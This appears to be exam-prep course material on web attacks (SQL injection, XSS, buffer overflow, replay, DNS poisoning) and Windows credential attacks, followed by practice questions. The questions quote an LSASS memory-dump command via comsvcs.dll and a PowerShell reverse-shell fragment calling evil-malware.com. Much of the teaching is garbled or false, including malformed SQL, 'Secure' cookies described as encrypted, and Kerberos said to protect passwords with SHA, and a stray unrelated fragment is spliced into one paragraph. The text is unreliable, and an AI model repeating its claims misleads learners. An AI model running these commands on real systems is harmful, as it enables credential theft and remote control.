PRACTICE

Web & Network Attacks

Let's start by explaining common attacks and how they work.

SQL Injection

SQL is a language to search a database. By abusing SQL injection, attackers can force the database to show more data than usual. This could include stuff like passwords.

SQL injection works by abusing "comments" and a special command "1=1".

It needs 2 parts (look for these on your exam):

1) The command 1=1, which means yes.
2) A comment symbol. This is usually #, ' or --

  • The command 1=1 means "yes" in SQL. 1=1 is a special instruction that tells the server to follow our orders.
  • The comment symbol tells the server to ignore everything after it. This can include error messages or warnings. That comment makes the server shut up and not give us any error messages.

So together, an attack looks like this. This command tells the server to give us every password, and ignore all errors:

SELECT * FROM passwords WHERE username = * OR 1=1#

Here are some examples of SQL injection for the exam. Try to spot the "1=1" part, and the comment sign which is #, ', or --

  • SELECT * FROM financial_data WHERE id = * OR '1'='1'--
  • SELECT * FROM secret_database WHERE row_number = * OR "1"='1'#
  • SELECT * FROM exam_answers WHERE answer = * OR '1=1#--

Cross-Site Scripting

Cross-Site Scripting (XSS) is when the attacker injects (uploads) malicious JavaScript code into the website. When the user visits the website, the malicious code will execute in their browser.

Tip: reflected XSS is sending a link to the victim. Stored XSS is uploading a file or data into a website where other users could see it.

Reflected XSS

Reflected is just a way of saying the attack runs instantly. Because it's like looking in a mirror - you see something immediately.

The attacker sends a malicious link to their victim. This link has a hidden script to some malware. For example:

www.link-to-real-site.com[script]malware.exe[/script]

When the user visits the link, the malware.exe attacks their browser instantly. This is Reflected XSS.

Stored XSS

Stored means the attacker uploads the malicious JavaScript command to the website.

The attacker enters malicious commands in any text area on a website. This could include a login box, a search box, a comment section on YouTube, etc. It could also be an upload form that lets you upload attachments.

For example, instead of searching for the name of a song, the attacker writes [script]malware.exe[/script] in the search box.

When the attacker hits enter, or presses search, the malware gets stored in the website database. Then it could affect other users or the server.

Buffer Overflow

A buffer is a temporary amount of memory on a website. A buffer has a fixed size. The amount of memory is decided by the programmer.

For example, imagine a text box on a website: "Please enter your age". Normal values for visitor ages are like 16-99 years old. So maybe the buffer size is 0-100. (It can take up to 3 characters from 0 to 100).

A buffer overflow is when the attacker uses a special technique to enter too much data, more than the size of the buffer. For example, "Please enter your age from 0-100" and the attacker enters "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" instead of a number from 0-100. This value is too big for the buffer.

What's the problem? The server gets confused. It doesn't know how to handle this input. So it accepts "arbitrary commands". Arbitrary command execution just means the server will obey ANY orders from the attacker. This can give complete control over the server.

An important fact to know: only some languages are vulnerable to buffer overflows. We will discuss this more later.

Replay Attacks

A "replay attack" just means stealing credentials. But instead of stealing a plaintext password, the credentials are usually stored in a cookie.

When you visit a website, sometimes it has a feature: "Remember me on this device for 30 days" or something. We call this feature "Session Management" and it's very common for websites to remember your login details. When you use this feature, it makes a cookie in your browser with your credentials (this cookie is called a "session token").

If an attacker can intercept or steal this cookie, they can "replay" it. This just means loading it in their web browser. Then they can login to the same site you have access to, instantly. It can even bypass MFA sometimes.

To stop replay attacks, we set the "Secure Cookies" parameter on the web server.

DNS Attacks

There are two important types of DNS attacks. One happens on public DNS servers (DNS cache poisoning). One happens on your local machine (hosts file poisoning).

DNS poisoning (also called DNS cache poisoning)

The attacker sends fake DNS data to a public DNS server. Until this gets detected, visitors will be sent to the wrong (malicious) website. For example:

www.real-safe-website.com has an IP address of 1.1.1.1

The attacker poisons the DNS server to change the IP address to 2.2.2.2. The IP address 2.2.2.2 is linked to a malware site.

Now, when people visit www.real-safe-website.com, the DNS server points them to 2.2.2.2 instead. This leads to malware.

Hosts file poisoning

This is similar, it's just that the target is the hosts file on your local device, not a public DNS server. The hosts file is a record of websites and IP addresses on your device. When you visit a website address, both Windows and Linux always check the local "hosts" file FIRST, before they check public DNS records.

If the attacker can edit the contents of this hosts file, they can redirect you to malicious websites.

For example, your hosts file contains the data:

www.real-safe-website.com 1.1.1.1

This means when you visit www.real-safe-website.com it sends you to the IP address 1.1.1.1.

The attacker simply edits the host file to this:

www.real-safe-website.com 2.2.2.2

This means when you visit www.real-safe-website.com it sends you to the IP address 2.2.2.2, which is a malware server.

Question 1 of 6

An analyst investigating a cyber breach discovers the following strange codes in the Apache server log files: SELECT * FROM password_table WHERE username = server_admin OR '1'='1'#-- What is the most likely attack in use?

Question 2 of 6

After visiting your website, a customer complains their email was phished. The link they visited was "www.bank-website.com[script]malware.com/phishingdownloader.js[/script]. What is the most likely type of attack?

Question 3 of 6

A hacker discovers a "USERNAME" field on a website that can accept a maximum of 64 bytes of data. The hacker injects 2000 bytes of data into this box, leading to arbitrary command execution. What is this technique?

Question 4 of 6

A customer is using public Wi-Fi in a coffee shop. They log into their YouTube account and presses a button to remember their credentials. An hour later, a hacker accesses the customer's YouTube account. What has most likely happened?

Question 5 of 6

A hacker finds a file upload feature on a website. The file upload has no protection or validation. The hacker uploads a Word document containing malicious JavaScript. Any time a user visits the Word document, their browser is attacked. What is the best description for this attack?

Question 6 of 6

A customer visits www.coffee-shop.com every day. When they visited the website today, they were instead redirected to a malware website. The IT department checks the user's hosts file, and it looks clean. What type of attack has likely happened?

Mitigations for web app attacks

The best ways to stop web attacks are:

  • Input validation: the server detects dangerous inputs from users and stops them from running.
  • Using secure coding practices: more details about this below.
  • Good testing: testing the website before launch in a safe testing environment.

We will cover these in more detail later.

For DNS attacks, it's best to install "DNSSECor DNS Security Extensions. This adds digital signatures to DNS responses, so they can't be faked by attackers.

To stop replay attacks, we use "Secure Cookies".

To stop buffer overflows, we use a "memory safe"/"type safe" language. Some languages are safe from buffer overflows.

Finally, there is a useful site for developers to learn more about web security. You don't have to visit this site, but you could be asked the name on the exam. It's called OWASP, the Open Web App Security Project.

Input Validation

Input validation is checking that the input from users is correct before the server processes it. It makes sure that data from public users is safe and in the right format.

You don't need to know how input validation happens, but here are some examples:

  • Range checks: checking a number or date is in an acceptable range (for example, the date of a doctor's appointment can't be in the past).
  • Length checks: checking that text is not too long or too short (this can stop buffer overflows).
  • Required fields: checks that the user entered something in a "required" box. For example, "Please enter your address, this is required".
  • Format check: checks the format is correct. For example, "emails must contain the @ sign".
  • Whitelisting (allow listing): Creating a strict list of allowed inputs and rejecting everything else.
  • Blacklisting (deny listing): Keeping a list of known malicious or invalid inputs and blocking them (though whitelisting is generally considered more secure).

Client-side vs. Server-side

Here is the most important point to know: Validation must happen on the server, never in the user's browser (client-side).

With server-side validation, the server decides if something is safe or correct. Attackers can't change that decision (unless they have full control over the server).

However, client-side validation can be bypassed in like 30 seconds by a skilled hacker. It is useless.

So why does client-side validation exist? It's fast. Client-side validation can be used in testing/demo websites where speed is important. But never for any secure website.

Secure coding practices

You don't need to know any coding for this exam, but here are some ways that developers make safe websites:

Using "memory safe" or "type safe" languages: These are programming languages that automatically stop buffer overflow attacks. Both "memory safe" and "type safe" mean the same thing. You don't need to know which languages, just remember "memory safe"/"type safe" = it stops buffer overflows.

Authentication & session management: Use strong, salted hashes for passwords. Enforce Multi-Factor Authentication (MFA). To stop replay attacks, use secure cookie handling. Cookies can have a setting called "Secure", which means they are encrypted and can't be stolen.

Error handling: Error messages on a website can give away really useful information to hackers. Avoid exposing sensitive system information in error messages.

Secure dependencies: This is a supply chain risk. Developers depend on something called "libraries". These are like small pieces of third-party software from other companies. They make development faster or easier. For example, it could be a plug-in feature for your website that lets you play videos from YouTube. These libraries could become outdated or infected by malware. Developers should scan their library files for malware regularly.one hacks them or tries to open them physically, they'll delete the keys.

Software testing

There are three main types of software testing.

Peer review (human review, also known as pair programming): This is like separation of duties. Two programmers work on the code together. They can spot each other's mistakes.

Static Analysis (SAST, Static Analysis Software Testing): An AI software scans the website's code without running the app. It finds weaknesses and vulnerabilities in the code.

Dynamic Analysis (DAST, Dynamic Analysis Software Testing): An AI software tests the website while it is running. It can check stuff like input validation and injection attacks.

Finally...

All testing must be done in a testing environment, on a safe server.

 

Question 1 of 5

A web developer wishes to read a framework of modern security guides and best practices for developers. Which site should they read?

Question 2 of 5

A website collects email addresses from visitors. An attacker entered the following text in the "Email address" field: "I DON'T WANT TO GIVE YOU MY EMAIL ADDRESS". What technique would prevent this behaviour?

Question 3 of 5

A company is concerned about buffer overflow attacks. Their website uses an old programming language called C++ as its language. This language is known to be vulnerable to buffer overflow attacks. What is the BEST solution?

Question 4 of 5

A website developer wants to test their website without running it, to see if any mistakes have been made. Which approach is best?

Question 5 of 5

A website developer installs a software library from a small independent company. The library promises to make the website faster. Two days later, the website is hacked. What most likely happened?

Windows network attacks

What hashes are used in Windows?

Windows uses two hashing algorithms to store passwords:

Kerberos: this is modern and safe. It uses SHA to protect passwords.
NTLM: this is an old type of hash that can be cracked easily. Microsoft stopped using it in 2025, but many older versions of Windows still use NTLM hashes.

What is the attacker's goal in Windows?

The goal is to find a hash. If it's NTLM hash, we can crack it and reveal the plaintext password. However, even if we find a Kerberos hash, maybe we can't crack it, but we can still abuse it for certain attacks.

There are a few important places in Windows that hackers want to target.

LSASS - Local Security Authority Subsystem Service (lsass.exe): this is the main Windows process that authenticates users. It stores the user's current password hash and it also stores Kerberos tickets. Attackers can use special tools to steal things from it.

SAM - Windows Security Account Manager (SAM) is a database file that stores local user account passwords in a hashed format.

What is the difference between LSASS and SAM? SAM is only for local accounts. LSASS is for "domain joined" users (Active Directory).

If the attacker steals a hash, they can try to crack it first. They take the hash to their laptop (usually Kali Linux) and brute force it. This is called an "offline attack" because it happens off the network.

Even if the attacker can't crack the hash, they could still use it to login. Some Windows misconfigurations let attackers login with a hash. This is called a "pass-the-hash" attack.

 

Persistence techniques in Windows

There are two advanced techniques hackers use to stay "persistent" in Windows (keep long-term, stealthy access to the victim).

1) You might see questions about "DLL injection" or "process injection". This technique is just uploading malware into a safe, trusted process that is already running on the targetFor example, I hack my boss's computer. My boss is using Excel.exe. I inject my malware into Excel.exe. Because Excel is already running, and it is trusted by Windows, my malware is less likely to be detected.

2) "Living off the Land" techniques. This means using tools that are already present on the target machine. These tools are trusted by Windows and they are digitally signed, so they are less suspicious. The attacker uses Windows tools to do their attack, so they don't need to upload malware (which could be detected). The most common tool in Windows is PowerShell. If you see a question with a PowerShell script, the attacker is usually trying to open an external connection to the internet, so they can steal files. We call that connection a "reverse shell".

 

Question 1 of 5

A CISO discovers that NTLM hashes are widely used on the corporate network, including in versions of Windows 7 and Windows 8. What is the primary risk to the organisation?

Question 2 of 5

While performing network analysis, a SOC analyst discovers the following strange command on a machine: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump [LSASS_PID] LSASS.exe > lsass.dmp full. What is the most likely explanation?

Question 3 of 5

A hacker extracts NTLM hashes from the Windows SAM file. These include the password hash for the local administrator account. Before attempting to crack these files, the attacker transfers them to a different computer that is not joined to the domain. What is this called and why is it done?

Question 4 of 5

An anti-malware platform scanning the network discovers the following script running with administrator privileges: powershell.exe $client = New-Object System.Net.Sockets.TCPClient('https://www.evil-malware.com',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; What is the BEST description for this?

Question 5 of 5

An attacker intercepts and steals the SHA hash and Kerberos ticket of the Domain Administrator account. Which of the following statements applies?